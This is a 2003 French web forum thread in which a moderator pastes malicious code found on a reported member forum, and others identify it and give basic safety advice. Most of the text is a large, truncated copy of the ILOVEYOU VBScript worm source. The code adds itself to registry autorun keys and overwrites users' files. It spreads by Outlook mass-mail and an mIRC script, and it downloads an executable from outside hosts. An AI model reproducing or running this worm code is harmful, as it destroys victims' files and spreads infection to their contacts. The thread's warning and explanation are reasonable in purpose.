Fermer la barre d'outils
Voir plus d'options
Voir moins d'options
les-forums.com : vous avez la parole
En moins de 5 minutes,
créez votre forum gratuitement
forum officiel aide/faq
support technique
Accueil Séparateur Présentation Séparateur Créez ! Séparateur Annuaire
Bienvenue sur le forum officiel de les-forums.com.
L'apprentissage des bases du HTML requises pour la personnalisation des forums concerne le sous-forum Programmation, tandis que les gros problèmes techniques sont à adresser au Support. La FAQ vous sera également très utile.
De plus, une lecture du bref règlement du forum pourra éviter bien des tracas.
Nous vous écoutons, soyez polis, patients et précis dans vos questions.
Pour suivre les informations officielles, suivez-nous en RSS ou via Twitter

les-forums.com - Forum officiel
A propos de les-forums.com (1911 topics, 31419 messages)
Topic "Trojan ou Virus & autre conneries du meme acabit .[...]" (Messages 1 à 14 sur 14) Fil RSS des messages de ce topic
Dernier message par Puppet_Master, le 31/10 à 20:00:29
Anonyme :
  • S'inscrire
  • S'identifier
Outils :
  • Recherche
 
Bas de la pageTopics
 
KeaX
http://precursed.free.fr/KeaX.jpg
inscrit le 30/10/2003
le 30/10/2003 à 19:02:32
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
http://www.les-forums.com/annuaire.cgi?goto=jackasse < N'aller pas sur ce forum , il d/l auto une connerie sur votre PC. voila je vouler juste informer les admin ici
Voir le profil de l'auteur Editer le message
Shadow77
adjoint
http://www.battle.net/images-new/portraits/w3xp/W3U5.gif

- les-forums -
- SquareFans -
inscrit le 05/12/2002
le 30/10/2003 à 19:55:15
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
Je vais prendre " le risque " d'y faire un tour .
 Si je vois que c'est vrai , je ferme le forum sans discution
Merci pour l'info .
Voir le profil de l'auteur Editer le message
Shadow77
adjoint
http://www.battle.net/images-new/portraits/w3xp/W3U5.gif

- les-forums -
- SquareFans -
inscrit le 05/12/2002
le 30/10/2003 à 19:56:33
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
wow :

rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines On Error Resume Next dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow eq="" ctr=0 Set fso = CreateObject("Scripting.FileSystemObject") set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbscopy=file.ReadAll main() sub main() On Error Resume Next dim wscr,rr set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") if (rr>=1) then Scripting Host\Settings\Timeout",0,"REG_DWORD" end if Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regruns() html() spreadtoemail() listadriv() end sub sub regruns() On Error Resume Next Dim num,downread regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 ",dirsystem&"\MSKernel32.vbs" regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi n32DLL",dirwin&"\Win32DLL.vbs" downread="" downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory") if (downread="") then downread="c:\" end if if (fileexist(dirsystem&"\WinFAT32.exe")=1) then Randomize num = Int((4 * Rnd) + 1) if num = 100000000000000000000 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe 546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" elseif num = 3 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm POhfgER67b3Vbvg/WIN-BUGSFIX.exe" elseif num = 4 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX .exe" end if end if if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI X",downread&"\WIN-BUGSFIX.exe" regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank" end if end sub sub listadriv On Error Resume Next Dim d,dc,s Set dc = fso.Drives For Each d in dc If d.DriveType = 2 or d.DriveType=3 Then folderlist(d.path&"\") end if Next listadriv = s end sub sub infectfiles(folderspec) On Error Resume Next dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) if (ext="vbs") or (ext="vbe") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close bname=fso.GetBaseName(f1.path) set cop=fso.GetFile(f1.path) cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) elseif(ext="mp3") or (ext="mp2") then set mp3=fso.CreateTextFile(f1.path&".vbs") mp3.write vbscopy mp3.close set att=fso.GetFile(f1.path) att.attributes=att.attributes+2 end if if (eq<>folderspec) then if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]" scriptini.WriteLine ";mIRC Script" scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will" scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks" scriptini.WriteLine ";" scriptini.WriteLine ";Khaled Mardam-Bey" scriptini.WriteLine ";http://www.mirc.com" scriptini.WriteLine ";" scriptini.WriteLine "n0=on 1:JOIN:#:{" scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" scriptini.WriteLine "n3=}" scriptini.close eq=folderspec end if end if next end sub sub folderlist(folderspec) On Error Resume Next dim f,f1,sf set f = fso.GetFolder(folderspec) set sf = f.SubFolders for each f1 in sf infectfiles(f1.path) folderlist(f1.path) next end sub sub regcreate(regkey,regvalue) Set regedit = CreateObject("WScript.Shell") regedit.RegWrite regkey,regvalue end sub function regget(value) Set regedit = CreateObject("WScript.Shell") regget=regedit.RegRead(value) end function function fileexist(filespec) On Error Resume Next dim msg if (fso.FileExists(filespec)) Then msg = 0 else msg = 1 end if fileexist = msg end function function folderexist(folderspec) On Error Resume Next dim msg if (fso.GetFolderExists(folderspec)) then msg = 0 else msg = 1 end if fileexist = msg end function sub spreadtoemail() On Error Resume Next dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="") then set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_HOUSE\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub sub html On Error Resume Next dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 dta1="

 :o
Allez hop. Poubelle
Voir le profil de l'auteur Editer le message
Puppet_Master
adjoint
http://membres.lycos.fr/panicattack/screens/trigun2.gif
inscrit le 05/03/2002
le 30/10/2003 à 20:06:37
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
Je ne sais pas s'il y avait un quelconque danger mais merci de nous avoir prévenu keax (+)
Voir le profil de l'auteur Editer le message
Couettecouette
signature modérée par Babaorum
inscrit le 18/11/2002
le 30/10/2003 à 20:06:56
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
Excuses-moi Shadow77, mais si nous y avons été (par le passé car je suis pas folle pour y aller maitenant), cela fait quoi sur notre ordi exactement ?!? o-o
Voir le profil de l'auteur Editer le message
Shadow77
adjoint
http://www.battle.net/images-new/portraits/w3xp/W3U5.gif

- les-forums -
- SquareFans -
inscrit le 05/12/2002
le 30/10/2003 à 20:10:11
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
Apparament c'est un script qui modifie la base de registre Windows (dans quel but?) . J'ai pas cherché à comprendre très loin j'ai supprimé direct . Ce genre de joujou on en veut pas.
Merci bien KeaX (+)
Voir le profil de l'auteur Editer le message
Couettecouette
signature modérée par Babaorum
inscrit le 18/11/2002
le 30/10/2003 à 20:45:13
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
Bon, ben merci ... (:)
Voir le profil de l'auteur Editer le message
Sufflope
http://sufflope.free.fr/avatars/mini/avatar019-mini.jpg

Model "zatous"
Surfing with Firebird
Brain Ver. Taré 2.6
inscrit le 28/03/2003
le 30/10/2003 à 20:51:06
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
(+) keax
(-) l'autre
Voir le profil de l'auteur Editer le message
Babaorum
adjoint
http://babaorum.site.voila.fr/img/sangoku_krilin.jpg
inscrit le 22/04/2002
le 31/10/2003 à 00:58:28
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
C'est un script VBS, mais ça ne modifiera rien sauf si l'utilisateur l'autorise (une popup demande confirmation pour exécution d'un ActiveX). C'est un piège pour les cliqueurs fous uniquement.
Vous ne reconnaissez pas ce virus de ver (worm-mail) très connu qui a tant fait parler de lui? :o) -> I-LOVE-YOU. Je reconnais le code. Grossier (!!)
Voir le profil de l'auteur Editer le message
Babaorum
adjoint
http://babaorum.site.voila.fr/img/sangoku_krilin.jpg
inscrit le 22/04/2002
le 31/10/2003 à 00:59:35
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
Oui merci Keax (+)
Pour la peine tu réduiras ta signature à 120 pixels de large... s'il-te-plaît :)

Merci en tout cas.
Voir le profil de l'auteur Editer le message
KeaX
http://precursed.free.fr/Scryed.jpg
inscrit le 30/10/2003
le 31/10/2003 à 15:39:10
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
ok trankill
Voir le profil de l'auteur Editer le message
Babaorum
adjoint
http://babaorum.site.voila.fr/img/sangoku_krilin.jpg
inscrit le 22/04/2002
le 31/10/2003 à 16:22:46
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
(jolie cette image au passage)

Pour revenir très brièvement sur ce problème de code VBScript: en l'état le VBScript est un script pour le *web* donc *incapable* d'agir sur un système local (l'ordinateur exécutant le script)
-> pas de manipulation de fichiers, du registre, du système en général

En revanche Windows utilise le WSH (Windows Scripting Host) pour étendre *localement* le VBScript, le JScript et d'autres langages de script web sur un système local et faire ces manipulations "dangereuses" que je viens de citer.

MAIS le visiteur qui affiche dans son navigateur (IE seulement à ma connaissance, pas Mozilla et consorts en tout cas) une page avec ce genre de script se voit demander s'il veut *autoriser* l'exécution de cette technologie dite *ActiveX*.
Enfin normalement, car il y a forcément de temps à autre des failles de sécurité.

D'où l'utilité cruciale de mettre Windows à jour avec *Windows Update* !
(une faille de ce genre a justement été corrigée récemment)

Bon c un peu compliqué à comprendre mais tout ça pour dire qu'il ne faut pas cliquer comme un dingue et qu'il vaut mieux refuser ce qu'on ne comprend pas ou ce dont on n'est pas sûr. Que ça soit sur le web, pour des e-mails etc etc etc.
Voir le profil de l'auteur Editer le message
Babaorum
adjoint
http://babaorum.site.voila.fr/img/sangoku_krilin.jpg
inscrit le 22/04/2002
le 31/10/2003 à 16:31:25
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
Ah voilà g retrouvé la bête en question, c'était bien ce que je pensais: http://www.securitymanager.com/v-descs/love.shtml
Voir le profil de l'auteur Editer le message
Puppet_Master
adjoint
http://membres.lycos.fr/panicattack/screens/trigun2.gif
inscrit le 05/03/2002
le 31/10/2003 à 20:00:29
Acces au message Trojan ou Virus & autre conneries du meme acabit ..
Merci des ces précisons Baba ;)
Voir le profil de l'auteur Editer le message
 
Haut de la pageTopics
 
Ajout de messages impossible Vous ne pouvez pas ajouter de messages.

Forum gratuit proposé par les-forums.com v 2.7 alpha 1 - Un service Twidi.com - Flux RSS du forum -

Page générée en 2,838 secondes le 09/01 à 05:10:36.